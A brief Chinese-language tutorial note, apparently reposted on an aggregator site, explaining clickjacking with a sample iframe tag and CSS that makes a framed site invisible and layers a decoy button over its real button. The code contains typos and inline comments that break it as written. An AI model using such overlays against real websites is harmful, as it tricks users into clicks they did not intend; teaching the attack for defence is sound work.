點(diǎn)擊劫持漏洞

點(diǎn)擊劫持：一個(gè)其他的網(wǎng)站，用iframe標(biāo)簽，<iframe?src=”http://xxx.xxx.xxx”></ifame>

<style> Html,body,iframe{ Display:block; 此處可以設(shè)為null Height:100%; Width:100%; Margin:0; margin和padding是元素間距離 Padding:0; Border:nonne; 去掉邊框 } </style>

點(diǎn)擊劫持：通過(guò)覆蓋不可見(jiàn)的框架誤導(dǎo)受害者點(diǎn)擊而造成的攻擊行為。

（UI覆蓋攻擊）

利用iframe或其他標(biāo)簽的屬性。

Iframe{ Opacity:0; 透明度 此處可以去掉因?yàn)橄旅婺且恍杏辛?Filter:alpha(opacity=0); IE -moz-opacity:0; 支持CSS3的瀏覽器（FF1.5也支持） Position:absolute Z-index:2;} Button{ 誘惑力圖片中的點(diǎn)擊按鈕 與背后的網(wǎng)站按鈕對(duì)應(yīng) Position:absoulte; Top:-5px; //圖片與瀏覽器垂直的距離 Left:875px; Z-index:1; //值越大越接近視覺(jué)距離 Width:72px; Height:26px; }

總結(jié)

以上是生活随笔為你收集整理的WEB安全基础-点击劫持漏洞基础的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。